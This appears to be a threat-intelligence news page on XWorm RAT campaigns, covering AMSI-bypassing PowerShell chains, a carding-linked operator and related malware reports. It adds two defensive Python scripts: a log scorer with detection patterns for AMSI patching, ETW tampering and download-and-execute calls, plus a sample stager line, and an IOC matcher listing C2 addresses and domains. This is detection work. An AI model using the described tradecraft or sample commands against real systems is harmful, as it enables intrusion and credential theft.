XWorm campaigns used AMSI bypasses and linked malware delivery to carding operations
Researchers detailed two XWorm delivery operations that relied on multi-stage loaders, in-memory execution, and AMSI bypasses to evade detection. In one campaign attributed to TAG-124, compromised legitimate websites redirected selected victims into a PowerShell chain that patched clr.dll to disable AmsiScanBuffer, suppressed PowerShell history, disabled ETW, fingerprinted hosts, and pulled an XOR-encrypted payload from sellmeyourbiz[.]com, ultimately delivering XWorm RAT. Breakglass reported low initial detection rates and observed victim-specific beaconing under /customers/, with encoded host details including hostname, domain, username, process ID, campaign ID, and hardware UUID.
A separate three-stage intrusion used a VBScript lure, Projet20Immobilier.vbs, masquerading as a French real-estate document to deploy XWorm V5.6 through a .NET loader and process injection into InstallUtil.exe. Breakglass assessed the operator was likely Brazilian based on Portuguese-language code artifacts and found the same infrastructure also hosted a Portuguese carding marketplace, Iluminat Store infosCC, suggesting a vertically integrated criminal pipeline that steals credentials and payment data with XWorm and monetizes them directly through fraud services. The malware infrastructure included servers on DigitalOcean and Contabo, and the sample used the default XWorm encryption key <123456789>, exposing weak operator OPSEC despite capabilities that included keylogging, screenshot capture, DNS hijacking, persistence, and ransomware plugin support.
Timeline
Mar 15, 2026
Breakglass links XWorm V5.6 delivery to Brazilian operator and carding shop
Breakglass analyzed a separate three-stage XWorm V5.6 infection chain using a VBScript lure, a .NET loader, and process injection into InstallUtil.exe, and assessed the operator was likely Brazilian based on Portuguese-language artifacts. The report also linked the malware infrastructure to a Portuguese-language carding marketplace, suggesting a vertically integrated cybercrime pipeline for stealing and monetizing credentials and payment data.
Mar 13, 2026
KongTuke campaign delivers XWorm RAT via multi-stage PowerShell chain
In March 2026, compromised legitimate websites redirected selected victims into a multi-stage PowerShell infection chain attributed to KongTuke / TAG-124 that ultimately delivered XWorm RAT from sellmeyourbiz[.]com. Breakglass identified Stage 2 as a coordinated AMSI-bypassing CLR patcher plus an obfuscated stager that also disabled ETW, fingerprinted hosts, and fetched an XOR-encrypted payload in memory.
Mar 13, 2026
KongTuke infrastructure receives TLS certificate
A Let's Encrypt certificate was issued for sellmeyourbiz[.]com, infrastructure later used in the KongTuke / TAG-124 infection chain. The report says the infrastructure was rapidly weaponized after certificate issuance.
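The chain described above leaves its tradecraft in PowerShell script-block logging (Event ID 4104): references to AmsiScanBuffer or clr.dll, history suppression, ETW tampering, XOR decoding of a fetched blob, and a beacon under /customers/. The following detection sketch is an added example, not Breakglass's or Mallory's code. The log entries are constructed, the indicator list and weights are an assumption based on the behaviours the report names, and the `/customers/` token format is a guess, since the page does not specify how the host details are encoded.

```python
"""Score PowerShell script-block log text for the KongTuke/TAG-124 tradecraft.

Added example; indicators, weights and sample blocks are constructed assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# (label, pattern, weight). Labels follow the behaviours named in the report;
# the specific strings and weights are assumptions, not from the page.
INDICATORS = [
    ("amsi_patch", re.compile(r"AmsiScanBuffer|\bclr\.dll\b", re.I), 3),
    ("history_suppress", re.compile(r"HistorySaveStyle\s+SaveNothing", re.I), 2),
    ("etw_disable", re.compile(r"EtwEventWrite|COMPlus_ETWEnabled", re.I), 2),
    ("xor_decode", re.compile(r"-bxor\b", re.I), 1),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression|DownloadData|DownloadString", re.I), 1),
    ("host_fingerprint", re.compile(r"Win32_ComputerSystemProduct|\bUUID\b", re.I), 1),
]
ALERT_THRESHOLD = 4  # assumption: tune against your own baseline

# Victim-specific beacon path reported under /customers/; the token shape is assumed.
BEACON_RE = re.compile(r"/customers/([A-Za-z0-9+/=_-]{16,})")


@dataclass
class Verdict:
    score: int = 0
    hits: List[str] = field(default_factory=list)
    beacon_token: Optional[str] = None

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def score_script_block(text: str) -> Verdict:
    """Return a weighted verdict for one script-block log entry."""
    v = Verdict()
    for label, pattern, weight in INDICATORS:
        if pattern.search(text):
            v.score += weight
            v.hits.append(label)
    m = BEACON_RE.search(text)
    if m:
        v.score += 2
        v.hits.append("customers_beacon")
        v.beacon_token = m.group(1)
    return v


def triage(blocks: Dict[str, str]) -> Dict[str, Verdict]:
    """Score a batch of named script blocks, e.g. pulled from 4104 events."""
    return {name: score_script_block(text) for name, text in blocks.items()}


# Constructed sample script blocks: one mimicking the stager's observable
# behaviour (string references only, no working bypass), one benign admin task.
SAMPLE_BLOCKS = {
    "stager": (
        "Set-PSReadlineOption -HistorySaveStyle SaveNothing; $t='AmsiScanBuffer'; "
        "$u=(Get-CimInstance Win32_ComputerSystemProduct).UUID; "
        "$b=(New-Object Net.WebClient).DownloadData("
        "'http://example.invalid/customers/aGVsbG8td29ybGQtdGVzdA=='); "
        "$p=$b|%{$_ -bxor 0x5a}"
    ),
    "admin": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB | Sort-Object LastWriteTime",
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_BLOCKS).items():
        flag = "ALERT" if verdict.alert else "ok"
        print(f"{name:8} {flag:5} score={verdict.score} hits={verdict.hits} beacon={verdict.beacon_token}")
```

The beacon token is surfaced separately so an analyst can pivot on it across proxy logs; the report notes the token carries hostname, domain, username, PID, campaign ID and hardware UUID, so two hosts should never share one.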
Related Stories

Multi-stage malware delivery chains distributing XWorm and other RATs
Researchers reported evolving **multi-stage, script-heavy infection chains** used to deliver remote access trojans, including **XWorm**, **AsyncRAT**, and **Xeno RAT**. Securonix described a campaign dubbed **VOID#GEIST** that starts from phishing-delivered batch scripts fetched from *TryCloudflare* infrastructure, then chains additional batch/PowerShell stages, deploys a legitimate embedded Python runtime, decrypts shellcode, and executes it filelessly by injecting into `explorer.exe` using **Early Bird APC injection**, reducing disk artifacts and making each stage appear benign in isolation. Separately, SANS ISC documented another **XWorm** wave using an obfuscated JavaScript-to-PowerShell loader chain that drops a temporary PowerShell script (e.g., `C:\Temp\ps_...ps1`), decodes additional in-memory PowerShell, and uses a DLL exporting `ProcessHollowing` to inject the XWorm client into a .NET compiler process. The write-up included configuration and IOCs such as a C2 endpoint `204[.]10[.]160[.]190:7003`, mutex `Cqu1F0NxohroKG5U`, and multiple SHA-256 hashes for the JavaScript, PowerShell, DLL loader, and XWorm payload, indicating continued high-volume distribution with frequently changing delivery techniques.
1 month ago
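Indicators on this page are printed defanged (`204[.]10[.]160[.]190:7003`, `sellmeyourbiz[.]com`), so they must be normalised before they can be matched against telemetry. The script below is an added example, not code from SANS ISC, Breakglass or Mallory: it refangs the page's IOCs and checks them against constructed proxy, EDR and DNS log lines. The log format (`key=value` pairs) and the sample lines are assumptions.

```python
"""Refang page IOCs and match them against key=value log lines.

Added example; the log format and sample lines are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# IOCs exactly as printed on this page (defanged).
PAGE_IOCS = {
    "c2": "204[.]10[.]160[.]190:7003",      # XWorm C2 from the SANS ISC write-up
    "mutex": "Cqu1F0NxohroKG5U",            # mutex from the same write-up
    "domain": "sellmeyourbiz[.]com",        # KongTuke / TAG-124 payload host
}

KV = re.compile(r"(\w+)=(\S+)")


def refang(ioc: str) -> str:
    """Undo common defanging: [.] (.) [:] and hxxp(s)://."""
    ioc = ioc.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"^hxxps?://", lambda m: m.group(0).replace("xx", "tt"), ioc, flags=re.I)


def split_host_port(value: str) -> Tuple[str, Optional[int]]:
    host, sep, port = value.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return value, None


def fields(line: str) -> Dict[str, str]:
    return dict(KV.findall(line))


def match_logs(lines: List[str], iocs: Dict[str, str] = PAGE_IOCS) -> List[Tuple[int, str]]:
    """Return (line_index, ioc_key) for every log line that touches an IOC."""
    refanged = {k: refang(v) for k, v in iocs.items()}
    c2_host, c2_port = split_host_port(refanged["c2"])
    hits = []
    for i, line in enumerate(lines):
        f = fields(line)
        # Network: destination and port must both match the C2 socket.
        if f.get("dst") == c2_host and f.get("dport") == str(c2_port):
            hits.append((i, "c2"))
        # Host: exact mutex name from an EDR mutex-creation event.
        if f.get("name") == refanged["mutex"]:
            hits.append((i, "mutex"))
        # DNS: the domain itself or any subdomain of it.
        q = f.get("query", "")
        if q == refanged["domain"] or q.endswith("." + refanged["domain"]):
            hits.append((i, "domain"))
    return hits


# Constructed sample telemetry; only three of the four lines should match.
SAMPLE_LOGS = [
    "2026-03-13T10:02:11Z proxy src=10.0.4.21 dst=204.10.160.190 dport=7003 bytes=612",
    "2026-03-13T10:02:40Z proxy src=10.0.4.21 dst=93.184.216.34 dport=443 bytes=9120",
    "2026-03-13T10:03:02Z edr host=WS-0421 event=mutex_create name=Cqu1F0NxohroKG5U pid=4412",
    "2026-03-13T10:05:55Z dns host=WS-0421 query=sellmeyourbiz.com type=A",
]

if __name__ == "__main__":
    for idx, key in match_logs(SAMPLE_LOGS):
        print(f"line {idx}: matched {key} -> {SAMPLE_LOGS[idx]}")
```

Matching on host and port together avoids false positives on shared hosting, and matching the mutex name gives a host-level confirmation that does not depend on the C2 address, which the related stories show rotates frequently.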
Multiple Malware Campaigns Abuse Phishing and Legitimate Cloud Services to Compromise Windows and Linux Systems
Reporting describes several unrelated but contemporaneous malware operations targeting both Windows and Linux environments. In Taiwan, FortiGuard Labs observed targeted phishing using tax and e-invoice lures to deliver **Winos 4.0 (ValleyRat)** and plugins, with delivery chains including malicious `.LNK` files, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud-hosted infrastructure that reduces the effectiveness of static blocklists. Separately, Cato CTRL reported a new Windows loader, **Foxveil**, that stages and retrieves shellcode via trusted platforms (**Cloudflare Pages**, **Netlify**, and **Discord attachments**) and executes payloads using techniques including **Early Bird APC injection** (often into a fake `svchost.exe`) or self-injection, while persisting via Windows services or masqueraded binaries dropped into `SysWOW64`. Additional reporting covers distinct campaigns in other regions and platforms. A LATAM-focused intrusion chain uses fake bank receipt lures (double-extension such as `.pdf.js`) to deliver **XWorm v5.6**, employing oversized/obfuscated JavaScript, WMI-based process creation (`Win32_Process`) to launch hidden PowerShell, and abuse of a hardcoded **Cloudinary** URL for staging—capabilities consistent with credential theft and enabling follow-on ransomware. Trellix analysis described a separate **Monero** cryptomining operation distributed via pirated software installers that propagates through **USB/external drives** to reach even air-gapped systems, using multi-component “watchdog” self-healing behavior and aggressive defense-evasion. On Linux, LevelBlue detailed a new **SysUpdate** variant (packed `ELF64`) that performs host reconnaissance and uses strong C2 encryption; researchers built a **Unicorn Engine**-based emulation tool to reproduce key generation/encryption routines and decrypt captured C2 traffic for investigation and detection engineering.
1 month ago
ResolverRAT, LummaStealer, and Amadey Linked in Multi-Tool Cybercrime Campaign
Researchers tied **ResolverRAT**, **LummaStealer**, and an **Amadey** botnet cluster to an active financially motivated campaign that has operated since at least late 2025 and uses fake browser update lures, staged loaders, and legitimate remote management tools for persistence. One analyzed chain used a Donut-decrypted, triple-protected `.NET` loader to deliver both ResolverRAT and LummaStealer at once, combining persistent remote access with credential and cryptocurrency wallet theft. The malware used layered obfuscation including .NET Reactor, custom transformations, AES-256-CBC, GZip, process hollowing, fragmented WinAPI reconstruction, forged compile timestamps, encrypted resource blobs, and certificate pinning, while operators rotated infrastructure across dozens of IPs, multiple domains, and hosting providers in Russia, the Netherlands, Germany, Poland, and elsewhere. Investigators also identified a fake Microsoft-themed domain, **pat[.]microsoft-telemetry[.]at**, and newly activated infrastructure such as **kampf[.]huehnchenfarm[.]ru** tied to the same ecosystem. A parallel March 2026 investigation linked the **fbf543** Amadey campaign to more than 50 payloads spanning at least 13 malware families, including Vidar, QuasarRAT, XWorm, AsyncRAT, Smoke Loader, and LummaStealer, with delivery through fake installers and hosting on infrastructure centered on **Omegatech LTD (AS202412)** and related abusive networks. Analysts found that the operators also abused nine legitimate, signed RMM tools from **ConnectWise, DattoRMM, Atera, GoToResolve, and N-able**, configuring them to beacon to attacker-controlled relays rather than compromising the vendors themselves. 
A separate Go-based loader unpacked LummaStealer with AES, RC4, and QuickLZ before hollowing **AppLaunch.exe**, reinforcing a playbook built around stealthy loaders, infostealer deployment, redundant access channels, and monetization consistent with an initial access broker or ransomware affiliate operation.
1 week ago